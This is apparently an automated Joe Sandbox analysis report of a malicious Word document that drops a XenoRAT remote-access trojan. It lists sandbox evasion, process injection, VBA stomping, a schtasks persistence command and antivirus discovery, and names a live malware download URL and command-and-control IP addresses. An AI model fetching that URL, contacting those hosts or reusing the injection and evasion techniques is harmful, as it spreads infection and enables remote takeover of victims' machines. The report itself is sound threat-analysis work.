Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Memory allocated: 23B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Memory allocated: 810000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Memory allocated: 1C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Memory allocated: 21F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Memory allocated: 480000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Window / User API: threadDelayed 676			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Window / User API: threadDelayed 9200			Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe TID: 3784	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe TID: 3832	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe TID: 3872	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe TID: 3920	Thread sleep count: 676 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe TID: 3920	Thread sleep count: 9200 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe TID: 3872	Thread sleep time: -220000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe TID: 1972	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe TID: 3932	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe TID: 3976	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe TID: 4008	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\taskeng.exe TID: 3152	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe TID: 3180	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe TID: 3312	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe TID: 2140	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe TID: 1216	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code contains process injector

Source: 4.2.MDEODF.exe.600000.2.raw.unpack, -----------------------------------------.cs	.Net Code: _200E_206A_206B_206E_200F_206E_200E_202E_200F_200F_202E_206F_202A_206D_202D_200E_206B_206A_200D_206B_206D_206F_202B_200F_202B_200C_206A_206C_206B_200B_206A_206C_202C_200D_202E_206B_202B_202D_202B_202E contains injection code
Source: 4.2.MDEODF.exe.600000.2.raw.unpack, -----------------------------------------.cs	.Net Code: _202B_202A_202C_200D_200F_202D_202D_206E_200B_200C_200B_206E_200B_200E_202B_200D_200C_200B_200C_206A_202D_206D_206B_206F_200E_206A_200D_202B_206E_206C_200E_202C_206E_200E_202D_206B_202C_202A_200E_200F_202E contains injection code
Source: 4.2.MDEODF.exe.600000.2.raw.unpack, -----------------------------------------.cs	.Net Code: _206B_206C_200F_200B_206B_206E_202A_200E_202C_202E_202A_202D_206F_200B_200B_206E_206B_206E_206E_202E_202C_202B_202E_202C_206F_200D_202A_206D_202C_206A_200B_202E_206A_206F_206B_200F_202A_206A_200C_202A_202E contains injection code

.NET source code references suspicious native API functions

Source: 4.2.MDEODF.exe.600000.2.raw.unpack, -----------------------------------------.cs	Reference to suspicious API methods: _200E_202B_202C_206C_202C_206F_202D_206D_206A_206A_202C_202D_206B_202A_202E_202D_200D_202A_206A_202B_202B_202A_206C_200B_202C_202E_202D_206F_206B_206C_206F_202E_206C_200F_206B_202B_202B_206D_200D_202D_202E<_206A_202B_202E_206C_206C_206F_200C_206A_206C_206E_200E_206C_206C_200B_202E_202A_206B_202B_200D_206C_202E_200B_200B_202C_200F_206A_206A_206F_206C_202E_202C_202E_202A_206B_206C_202A_206E_202C_206E_202D_202E>("kernel32", "VirtualAllocEx")
Source: 4.2.MDEODF.exe.600000.2.raw.unpack, -----------------------------------------.cs	Reference to suspicious API methods: _200E_202B_202C_206C_202C_206F_202D_206D_206A_206A_202C_202D_206B_202A_202E_202D_200D_202A_206A_202B_202B_202A_206C_200B_202C_202E_202D_206F_206B_206C_206F_202E_206C_200F_206B_202B_202B_206D_200D_202D_202E<_206D_202E_206F_200F_200F_206F_200B_206F_202C_200D_202E_202E_202D_206D_202E_200D_206C_202B_206B_206C_202B_202C_206A_206E_202A_202E_206B_200D_200E_206B_206D_206C_200D_202A_206A_206B_202A_200F_202B_206C_202E>("ntdll", "NtWriteVirtualMemory")
Source: 4.2.MDEODF.exe.600000.2.raw.unpack, -----------------------------------------.cs	Reference to suspicious API methods: _200E_202B_202C_206C_202C_206F_202D_206D_206A_206A_202C_202D_206B_202A_202E_202D_200D_202A_206A_202B_202B_202A_206C_200B_202C_202E_202D_206F_206B_206C_206F_202E_206C_200F_206B_202B_202B_206D_200D_202D_202E<_202D_206B_200B_200F_200D_206B_206B_206E_200F_206F_202C_202D_200B_200C_200C_202C_202D_202B_206F_202D_200F_202D_202E_206A_200B_202E_206D_200D_200C_202C_202A_206F_206E_200E_202E_202C_200B_200E_202D_200E_202E>("ntdll", "NtSetContextThread")

Document contains VBA stomped code (only p-code) potentially bypassing AV detection

Source: yIla7SeJ6r.doc

OLE indicator, VBA stomping: true

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Memory written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Memory written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Memory written: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Memory written: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Memory written: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Memory written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Memory written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Memory written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe base: 400000 value starts with: 4D5A	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process created: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe "C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp6A67.tmp" /F	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Process created: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Process created: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Process created: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Queries volume information: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Queries volume information: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Queries volume information: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Queries volume information: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe VolumeInformation

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct

Stealing of Sensitive Information

Yara detected XenoRAT

Source: Yara match	File source: 8.2.MDEODF.exe.2419b5c.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.MDEODF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MDEODF.exe.201a318.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.MDEODF.exe.2419b5c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MDEODF.exe.201a318.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.380210454.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.380210454.0000000002500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.375878692.0000000002011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.375386923.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.393953865.0000000002135000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.380210454.0000000002411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.393953865.0000000002207000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.375878692.00000000020F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MDEODF.exe PID: 3772, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MDEODF.exe PID: 3812, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MDEODF.exe PID: 3884, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MDEODF.exe PID: 3168, type: MEMORYSTR

Remote Access Functionality

Yara detected XenoRAT

Source: Yara match	File source: 8.2.MDEODF.exe.2419b5c.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.MDEODF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MDEODF.exe.201a318.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.MDEODF.exe.2419b5c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MDEODF.exe.201a318.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.380210454.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.380210454.0000000002500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.375878692.0000000002011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.375386923.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.393953865.0000000002135000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.380210454.0000000002411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.393953865.0000000002207000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.375878692.00000000020F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MDEODF.exe PID: 3772, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MDEODF.exe PID: 3812, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MDEODF.exe PID: 3884, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MDEODF.exe PID: 3168, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	52 Scripting	Valid Accounts	1 Windows Management Instrumentation	52 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 Obfuscated Files or Information	211 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	14 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	33 Exploitation for Client Execution	1 DLL Side-Loading	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	12 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	Login Hook	12 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	41 Virtualization/Sandbox Evasion	SSH	Keylogging	213 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	41 Virtualization/Sandbox Evasion	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	211 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
yIla7SeJ6r.doc	100%	Avira	HEUR/Macro.Downloader.MRDO.Gen
yIla7SeJ6r.doc	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\Desktop\~WRD0000.tmp	100%	Avira	HEUR/Macro.Downloader.PBJD.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\brtyhdrh[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\~WRD0000.tmp	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\brtyhdrh[1].exe	47%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	47%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	47%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Label	Link
https://www.stipamana.com/sedtryerytsrtyuerthreytwsytysrerter/zgdargaregwaerwgsergtseggs/dfghsgthwstrsrthtghtgh/brtyhdrh.exe	100%	Avira URL Cloud	malware
87.120.120.27	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.stipamana.com	87.121.86.205	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
87.120.120.27	true	Avira URL Cloud: safe	unknown
https://www.stipamana.com/sedtryerytsrtyuerthreytwsytysrerter/zgdargaregwaerwgsergtseggs/dfghsgthwstrsrthtghtgh/brtyhdrh.exe	true	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
87.120.120.27	unknown	Bulgaria		25206	UNACS-AS-BG8000BurgasBG	true
87.121.86.205	www.stipamana.com	Bulgaria		34577	SKATTV-ASBG	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1569823
Start date and time:	2024-12-06 10:28:50 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 3s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	yIla7SeJ6r.doc renamed because original name is a hash value
Original Sample Name:	26973056c194b68b10d1c2b9a632a27e.doc
Detection:	MAL
Classification:	mal100.troj.expl.evad.winDOC@28/17@1/2
EGA Information:	Successful, ratio: 36.4%
HCA Information:	Successful, ratio: 95% Number of executed functions: 179 Number of non-executed functions: 2
Cookbook Comments:	Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Found warning dialog Click Ok Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
Execution Graph export aborted for target MDEODF.exe, PID 3216 because it is empty
Execution Graph export aborted for target MDEODF.exe, PID 3320 because it is empty
Execution Graph export aborted for target MDEODF.exe, PID 3812 because it is empty
Execution Graph export aborted for target MDEODF.exe, PID 3948 because it is empty
Execution Graph export aborted for target MDEODF.exe, PID 3964 because it is empty
Execution Graph export aborted for target MDEODF.exe, PID 3996 because it is empty
Execution Graph export aborted for target MDEODF.exe, PID 976 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: yIla7SeJ6r.doc

Simulations

Behavior and APIs

Time	Type	Description
01:29:55	Task Scheduler	Run new task: mrec path: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
04:29:50	API Interceptor	1108x Sleep call for process: MDEODF.exe modified
04:29:54	API Interceptor	3x Sleep call for process: schtasks.exe modified
04:29:55	API Interceptor	231x Sleep call for process: taskeng.exe modified

LLM Input / Output

Input	Output
URL: Screenshot id: 7 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 10 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Please wait...", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 6 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "To view secured document, click here", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 9 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Please wait...", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 8 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 7 Model: Joe Sandbox AI	{ "brands": "unknown" }
